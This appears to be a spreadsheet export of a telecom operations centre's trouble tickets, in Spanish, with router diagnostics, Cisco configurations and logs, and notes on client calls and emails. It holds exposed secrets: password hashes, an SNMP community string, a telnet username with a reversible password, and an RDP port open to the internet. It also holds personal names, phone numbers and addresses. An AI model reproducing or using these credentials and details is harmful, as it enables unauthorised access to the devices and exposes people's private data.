PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN VPN_DHL-INT_0 187.128.52.66
  PING 187.128.52.66: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 187.128.52.66 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.36.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE VPN_DHL-INT_0 187.128.52.66
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : VPN_DHL-INT_0
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  187.128.52.64/30  DIRECT  0    0             D   187.128.52.65   GIGABITETHERNET4/0/1.725			</t>
  </si>
  <si>
    <t>F4598753</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO PROVOCADO POR FALL DE NMIS
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 2 SEMANAS.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2], RELEASE SOFTWARE (FC1)
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0161 UPTIME IS 2 WEEKS, 11 HOURS, 9 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH:C860VAE2-ADVSECK9_NPE-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9016V
1 DSL CONTROLLER
1 ETHERNET INTERFACE
3 FASTETHERNET INTERFACES
4 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 TERMINAL LINE
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
8192K BYTES SYSTEM FLASH ALLOCATED
CONFIGURATION REGISTER IS 0X2102
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0161#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3108 BYTES
!
VERSION 15.6
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_CREDOMATIC_GT_INTERNET_AGENCIA_0161
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$QGTH$4YTYFB0WMVR4DU.C7BWVM.
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
!
!
!
!
!
!
USERNAME GESTIONIP SECRET 5 $1$B/0W$4CZHSFLI7AOJL49GNABVG1
!
!
CONTROLLER VDSL 0
 SHUTDOWN
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.172.164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LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET2
 DESCRIPTION WAN PRINCIPAL/_/17400418T/_/
 BANDWIDTH 5120
 IP ADDRESS 10.78.160.79 255.255.255.224
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED 100
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 190.56.18.53 255.255.255.252
 RATE-LIMIT INPUT 5120000 640000 1280000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 640000 1280000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP ROUTE 0.0.0.0 0.0.0.0 10.78.160.65
IP SSH SERVER ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
IP SSH CLIENT ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK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CREDOMATIC_GT_INTERNET_AGENCIA_0161#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 33 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 33 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (8192 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 34 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*MAY 29 00:45:34.503: PIM: BFD INITIALIZATION FAILED
*MAY 29 00:45:47.015: %LINK-3-UPDOWN: INTERFACE ETHERNET0, CHANGED STATE TO DOWN
*MAY 29 00:45:47.015: %LINK-3-UPDOWN: INTERFACE ATM0, CHANGED STATE TO DOWN
*MAY 29 00:45:47.015: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VOIP-NULL0, CHANGED STATE TO UP
*MAY 29 00:45:47.015: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET2, CHANGED STATE TO DOWN
*MAY 29 00:45:47.559: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*MAY 29 00:45:48.659: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ETHERNET0, CHANGED STATE TO DOWN
*MAY 29 00:45:48.663: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0, CHANGED STATE TO DOWN
*MAY 29 00:45:48.663: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET2, CHANGED STATE TO DOWN
*MAY 29 00:45:53.119 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 29 00:45:53.955 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 29 00:45:54.295 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C860 SOFTWARE (C860VAE2-ADVSECK9_NPE-M), VERSION 15.6(3)M3A, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2017 BY CISCO SYSTEMS, INC.
COMPILED TUE 19-SEP-17 00:39 BY PROD_REL_TEAM
*MAY 29 00:45:54.295 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_CREDOMATIC_GT_INTERNET_AGENCIA_0161 IS UNDERGOING A COLD START
*MAY 29 00:45:54.867 UTC: %LINK-5-CHANGED: INTERFACE ATM0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 00:45:54.875 UTC: %LINK-5-CHANGED: INTERFACE ETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 00:45:54.887 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 00:45:54.895 UTC: %LINK-5-CHANGED: INTERFACE FASTETHERNET1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 00:45:54.907 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 00:45:54.911 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 00:45:55.123 UTC: %LINK-3-UPDOWN: INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*MAY 29 00:45:55.887 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0, CHANGED STATE TO DOWN
*MAY 29 00:45:55.895 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*MAY 29 00:45:55.907 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 29 00:45:55.911 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*MAY 29 00:45:55.955 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET2, CHANGED STATE TO UP
*MAY 29 00:45:56.123 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*MAY 29 00:45:56.143 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE WLAN-GIGABITETHERNET0, CHANGED STATE TO UP
*MAY 29 00:45:56.955 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET2, CHANGED STATE TO UP
*MAY 29 00:46:09.303 UTC: %BOOT SECOND FIRMWARE WITH EMBEDDED BINARY.
*MAY 29 00:46:09.467 UTC: %BOOT SECOND CORE FIRMWARE
*MAY 29 00:46:21.707 UTC: %CONTROLLER-5-UPDOWN: CONTROLLER VDSL 0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 29 00:46:24.499 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*MAY 29 00:46:46.755 UTC: %SYS-6-STACKLOW: STACK FOR LEVEL GENERAL INTERRUPT RUNNING LOW, 0/9000
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0161#
SHOW CLOCK
*11:54:29.213 UTC SUN JUN 12 2022
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0161#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.78.160.65            0   8CFD.18AA.6CD3  ARPA   GIGABITETHERNET2
INTERNET  10.78.160.79            -   34F8.E73E.56C5  ARPA   GIGABITETHERNET2
INTERNET  190.56.18.53            -   34F8.E73E.56C0  ARPA   VLAN1
INTERNET  190.56.18.54            0   E0CB.BC12.9948  ARPA   VLAN1
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0161#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            ADMIN DOWN     DOWN
ET0                            ADMIN DOWN     DOWN
FA0                            ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA1                            ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA2                            UP             UP       LAN DEL CLIENTE
GI0                            ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI1                            ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI2                            UP             UP       WAN PRINCIPAL/_/17400418T/_/
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0161#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UP                    UP
GIGABITETHERNET0           UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET1           UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET2           10.78.160.79    YES NVRAM  UP                    UP
LOOPBACK5                  10.212.172.164  YES NVRAM  UP                    UP
VLAN1                      190.56.18.53    YES NVRAM  UP                    UP
CC_CREDOMATIC_GT_INTERNET_AGENCIA_0161#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.78.160.79
  PING 10.78.160.79: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.78.160.79 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.77
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.78.160.79
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.78.160.79/32  DIRECT  0    0                 0.0.0.0         VLANIF3750</t>
  </si>
  <si>
    <t>F4598757</t>
  </si>
  <si>
    <t>ENALCE OPERATICOV CSE PORCEDE CON CIERRE
}TORRE_CAFE#PING VRF TYT 192.168.174.166 RE 1000
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1000, 100-BYTE ICMP ECHOS TO 192.168.174.166, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (1000/1000), ROUND-TRIP MIN/AVG/MAX = 4/5/20 MS
TORRE_CAFE#</t>
  </si>
  <si>
    <t>F4598853</t>
  </si>
  <si>
    <t>SE CONSULTO A CLIENTE VIA GRUPO DE SKYPE
08:20
BUEN DÍA, TENDRÁN INFORMACIÓN DE ESTA SUCURSAL  CC_AZTECA_GT_SUC001053/ 265900403T?</t>
  </si>
  <si>
    <t>F4598857</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 12 DE JUNIO DE 2022 9:41PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM198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8857
ID: 47501638T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM1984
UBICADO EN:  CAJERO 1984 SUPER 24 COBAN 2, 6 AV. 5-36 ZONA 3 COBAN ALTA VERAPAZ
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4598879</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CL CARLOS || SE LE IFORMA QUE SE COORDINARA VISITA, AVANCES EN 1 HORA.
2001717131
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 0050376027774
NÚMERO: 0050376027774
DURACIÓN: 0:03:54
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050376027774
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JAIMEJ.HERNANDEZ
FECHA Y HORA LOCALES: 12/06/2022 10:58:39</t>
  </si>
  <si>
    <t>F4598890</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FATIMA POCASANGRE AL 79892259 INDICA QUE SI HAY ALGUIEN EN EL LUGAR QUE NOS COMUNIQUEMOS AL NUMERO 77696946  **
ID 2001807217
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL NUMERO 77696946  PERO NO RESPONDE || ENVIA A BUZON | SE INTENTARA LUEGO **
-ID 2001807639 - 2001808042
**</t>
  </si>
  <si>
    <t>SE CAMBIA ODU RADWIN 200 SERVICIO LEVANTA
&lt;OSONSVZ0N1D1EID1&gt;PING -VPN-INSTANCE INTERNET_ID_ESV 10.130.71.101
  PING 10.130.71.101: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.130.71.101: BYTES=56 SEQUENCE=1 TTL=255 TIME=6 MS
    REPLY FROM 10.130.71.101: BYTES=56 SEQUENCE=2 TTL=255 TIME=6 MS
    REPLY FROM 10.130.71.101: BYTES=56 SEQUENCE=3 TTL=255 TIME=7 MS
    REPLY FROM 10.130.71.101: BYTES=56 SEQUENCE=4 TTL=255 TIME=14 MS
    REPLY FROM 10.130.71.101: BYTES=56 SEQUENCE=5 TTL=255 TIME=6 MS
  --- 10.130.71.101 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 6/7/14 MS
&lt;OSONSVZ0N1D1EID1&gt;TELNET VPN-INSTANCE INTERNET_ID_ESV 10.130.71.101
TRYING 10.130.71.101 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.130.71.101 ...
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
USER ACCESS VERIFICATION
USERNAME:
% USERNAME:  TIMEOUT EXPIRED!
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;OSONSVZ0N1D1EID1&gt;TELNET VPN-INSTANCE INTERNET_ID_ESV 10.130.71.101
TRYING 10.130.71.101 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.130.71.101 ...
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
USER ACCESS VERIFICATION
USERNAME: T3LN0CR3D3S
PASSWORD:
% AUTHENTICATION FAILED
USERNAME: T3LN0CR3D3S
PASSWORD:
ID1099135#SHO IP INT BRIE
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   UNASSIGNED      YES NVRAM  UP                    UP
GI0/0/0.1036           10.130.71.101   YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/0   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/1   UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET0/1/2   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/3   UNASSIGNED      YES UNSET  UP                    UP
LOOPBACK5              10.166.0.142    YES NVRAM  UP                    UP
VLAN1                  201.247.178.254 YES NVRAM  UP                    UP
ID1099135#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.130.71.101           -   7C21.0E35.6380  ARPA   GIGABITETHERNET0/0/0.1036
INTERNET  10.130.71.102           8   8CFD.18A2.9B4E  ARPA   GIGABITETHERNET0/0/0.1036
INTERNET  192.168.123.1           -   7C21.0E35.63F4  ARPA   VLAN1
INTERNET  192.168.123.11          0   0090.E87D.8D69  ARPA   VLAN1
INTERNET  192.168.123.50        242   0040.ADAB.9C6A  ARPA   VLAN1
INTERNET  192.168.123.100         3   8030.E03B.37E8  ARPA   VLAN1
INTERNET  192.168.123.101         0   08F1.EA6B.F81E  ARPA   VLAN1
INTERNET  192.168.123.102         6   C8D9.D21B.148C  ARPA   VLAN1
INTERNET  192.168.123.103         0   0030.D61E.5324  ARPA   VLAN1
INTERNET  192.168.123.201        21   0040.ADB5.C40A  ARPA   VLAN1
INTERNET  201.247.178.253         0   INCOMPLETE      ARPA
INTERNET  201.247.178.254         -   7C21.0E35.63F4  ARPA   VLAN1
ID1099135#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 10493 BYTES
!
! LAST CONFIGURATION CHANGE AT 15:34:35 GMT SUN JUN 12 2022
!
VERSION 16.10
SERVICE NAGLE
NO SERVICE PAD
SERVICE TCP-KEEPALIVES-IN
SERVICE TCP-KEEPALIVES-OUT
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
SERVICE CALL-HOME
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME ID1099135
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
NO LOGGING CONSOLE
ENABLE SECRET 9 $9$0ZDZMOP35ELPLU$X7IG.TN18P2KG8RWHRDWT9O4GDFBE4LFGOTFBSOVN/2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NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
!
NO IP BOOTP SERVER
IP NAME-SERVER 201.247.155.225 201.247.157.225
IP DOMAIN NAME TELECOM.COM.SV
IP DHCP EXCLUDED-ADDRESS 192.168.123.250 192.168.123.255
IP DHCP EXCLUDED-ADDRESS 192.168.123.1 192.168.123.209
!
IP DHCP POOL ID1099135
 NETWORK 192.168.123.0 255.255.255.0
 DEFAULT-ROUTER 192.168.123.1
 DNS-SERVER 201.247.155.225 201.247.157.225
!
!
!
LOGIN ON-SUCCESS LOG
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-995391022
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-995391022
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-995391022
!
CRYPTO PKI TRUSTPOINT SLA-TRUSTPOINT
 ENROLLMENT PKCS12
 REVOCATION-CHECK CRL
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-995391022
 CERTIFICATE SELF-SIGNED 01
  3082032E 30820216 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  30312E30 2C060355 04031325 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 39393533 39313032 32301E17 0D323031 31323631 38323834
  365A170D 33303031 30313030 30303030 5A303031 2E302C06 03550403 1325494F
  532D5365 6C662D53 69676E65 642D4365 72746966 69636174 652D3939 35333931
  30323230 82012230 0D06092A 864886F7 0D010101 05000382 010F0030 82010A02
  82010100 8AA0D4E3 6D4DA79B 7DFF2821 27DDC396 8125C142 EB255C87 9AB5C895
  A30B3D4C DE523FEF E3789F6B D0A8CC84 7274FF77 2B51D30F 7355EAA6 306B3D15
  73692BAF 2E8C5DCE 99B25327 92C18E06 7572BCDF B07C5E65 DECF59B9 33171CB5
  6D599438 446D975A 62AF926A 4C4BD7F3 D80B2EB7 CCD66F8C 7402D8B4 682E8ED7
  42D68302 3AC93281 D4C839A5 E5CCDC96 36488EF4 2983130D CD9F8979 43C2F0EC
  207F8F5A 294085EA 81EE7166 055100FD B376BEAC F95784C1 2C71DA42 BD0FC6E0
  F5E7AC14 8AB38A6D 62BF3A12 703C064D 585437AA 9EFDFACD 5B74B508 ED88D19A
  4006DAEE 77CFEDC4 15C86299 4AC50AC5 49C3313C 36476F5C 35D3E0F3 018EAD1F
  0C07CCEF 02030100 01A35330 51300F06 03551D13 0101FF04 05300301 01FF301F
  0603551D 23041830 168014C8 868E36A7 40880480 D8F80393 0111F8F3 69F4C530
  1D060355 1D0E0416 0414C886 8E36A740 880480D8 F8039301 11F8F369 F4C5300D
  06092A86 4886F70D 01010505 00038201 01007782 22FBA25B 2204199E BAB17156
  5CAE876A 412E2323 0EFC316A 673AF241 64DC141E D009A395 5F4E169E 51802A93
  66C4AEFF 1A940B05 F511F9F3 9FA9D808 892CE385 451F91C2 F9AFD68B 141A1363
  EB479420 EEA6D286 EA22BE2C DFD919C4 6640027A D0CA4A4B 91E279EB EFD70AA6
  39BC5E35 6E6ACB9B B5B8352B 12B207C7 3DD5B6F9 DA43B884 0C6CC6EB 4DA66F0F
  E1797364 51C3DD81 784A056A DF72956B CA7DE699 85912C08 2A7118C6 1D643EDA
  8DCC2BA2 3FEC7EAB C8BC5F69 B11E8544 242BCA3D D3A6C95F A405861F 880653D8
  9FFAEB2C 73F93638 84856883 B363142F FBA21D42 7FF5BB90 7FE8BD4F FB159B7F
  BAE4FEF3 5B4A4C44 46863B8C 4722E2A7 F88B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40105S
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 09581D05175514405B5C5C
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
NO CDP RUN
!
!
CLASS-MAP MATCH-ALL SERVICIOS_5M
 MATCH ANY
!
POLICY-MAP SERVICIOS_5M
 CLASS SERVICIOS_5M
  POLICE CIR 5120000 BC 960000 BE 1920000 CONFORM-ACTION TRANSMIT  EXCEED-ACTION DROP  VIOLATE-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.0.142 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 NO IP ADDRESS
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/0.1036
 DESCRIPTION WAN PRINCIPAL/_/ID1099135/_/
 BANDWIDTH 5120
 ENCAPSULATION DOT1Q 1036
 IP ADDRESS 10.130.71.101 255.255.255.252
 IP NAT OUTSIDE
 SERVICE-POLICY INPUT SERVICIOS_5M
 SERVICE-POLICY OUTPUT SERVICIOS_5M
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
!
INTERFACE GIGABITETHERNET0/1/1
!
INTERFACE GIGABITETHERNET0/1/2
!
INTERFACE GIGABITETHERNET0/1/3
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.168.123.1 255.255.255.0 SECONDARY
 IP ADDRESS 201.247.178.254 255.255.255.252
 IP NAT INSIDE
!
IP FORWARD-PROTOCOL ND
IP TCP SYNWAIT-TIME 10
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP NAT INSIDE SOURCE STATIC TCP 192.168.123.100 3389 201.247.178.254 3389 EXTENDABLE
IP NAT INSIDE SOURCE STATIC UDP 192.168.123.100 3389 201.247.178.254 3389 EXTENDABLE
IP NAT INSIDE SOURCE LIST 1 INTERFACE VLAN1 OVERLOAD
IP ROUTE 0.0.0.0 0.0.0.0 10.130.71.102
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 1 PERMIT 192.168.1.0 0.0.0.255
ACCESS-LIST 1 PERMIT 192.168.123.0 0.0.0.255
ACCESS-LIST 66 PERMIT 10.0.0.0 0.255.255.255
